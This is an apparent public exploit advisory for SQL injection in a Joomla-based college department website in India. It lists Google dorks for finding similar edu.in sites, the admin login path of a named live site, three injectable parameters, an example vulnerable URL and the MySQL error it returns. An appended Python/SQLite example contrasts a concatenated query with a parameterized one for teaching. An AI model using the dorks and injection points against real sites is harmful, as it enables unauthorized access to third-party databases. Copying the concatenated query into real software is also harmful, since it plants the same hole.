
Joomla Department of Computer Engineering OmEducation India SQL Injection Vulnerability

Author: KingSkrupellos , Published: 09-11-2018
# Exploit Title : Joomla Department of Computer Engineering OmEducation India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/11/2018
# Vendor Homepage : spectrom16.omeducation.edu.in
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Design & Developed By Department of Computer Engineering'' site:edu.in
intext:''Design By Computer Department'' site:edu.in
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

spectrom16.omeducation.edu.in/administrator/

#################################################################################################

# SQL Injection Exploit :

/edepartment.php?id=[ID-NUMBER]&&deptid=[SQL Injection]

/facultydetails.php?deptid=[ID-NUMBER]&id=[SQL Injection]

/gallery_detail.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site =>

omeducation.edu.in/edepartment.php?id=3&&deptid=10%27 => [ Proof of Concept ] => archive.is/cQ9oA

#################################################################################################

# SQL Database Error :

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''10'' && page_type='' order by event_date desc LIMIT 10, 5' at line 1
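The error text shows the root cause: the `deptid` request parameter is concatenated into a quoted literal of a query that also filters on `page_type` and sorts by `event_date`, so a single stray quote breaks the statement. As an added example that is not part of the advisory or of the affected site's code, the following Python/SQLite snippet reproduces that concatenation pattern beside a parameterized version; the table name `dept_events` and the sample rows are constructed, while the column names come from the error message.

```python
import sqlite3

# Constructed fixture. The table name dept_events is hypothetical; the columns
# deptid, page_type and event_date are the ones visible in the MySQL error.
SCHEMA = """
CREATE TABLE dept_events (
    id         INTEGER PRIMARY KEY,
    deptid     TEXT NOT NULL,
    page_type  TEXT NOT NULL DEFAULT '',
    event_date TEXT NOT NULL
);
INSERT INTO dept_events (deptid, page_type, event_date) VALUES
    ('10', '', '2018-11-01'), ('10', '', '2018-10-01'), ('11', '', '2018-09-01');
"""

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def events_vulnerable(conn, deptid, page_type=""):
    """Concatenation pattern implied by the error: the request parameter is
    pasted into a quoted literal. MySQL's && is spelled AND for SQLite and the
    page's LIMIT 10, 5 pagination is shortened to LIMIT 5 for the fixture."""
    sql = (f"SELECT id FROM dept_events WHERE deptid='{deptid}' "
           f"AND page_type='{page_type}' ORDER BY event_date DESC LIMIT 5")
    return [row[0] for row in conn.execute(sql)]

def events_safe(conn, deptid, page_type=""):
    """Hardened form: bound parameters, so a quote in deptid is compared as
    data and cannot change the statement. An allow-list such as
    deptid.isdigit() at the controller is a sensible second layer."""
    sql = ("SELECT id FROM dept_events WHERE deptid=? AND page_type=? "
           "ORDER BY event_date DESC LIMIT 5")
    return [row[0] for row in conn.execute(sql, (deptid, page_type))]

def compare(deptid):
    """Run one input through both paths on a fresh database and return
    (vulnerable_result, safe_result); a statement broken by the input is
    reported as a string starting with 'syntax error' instead of raising."""
    conn = fresh_db()
    try:
        vulnerable = events_vulnerable(conn, deptid)
    except sqlite3.OperationalError as exc:
        vulnerable = f"syntax error: {exc}"
    safe = events_safe(conn, deptid)
    conn.close()
    return vulnerable, safe
```

`compare("10")` returns the same two rows from both paths, while `compare("10'")` reports a syntax error from the concatenated query (the SQLite counterpart of the MySQL error quoted above) and an empty, intact result from the parameterized one.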

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
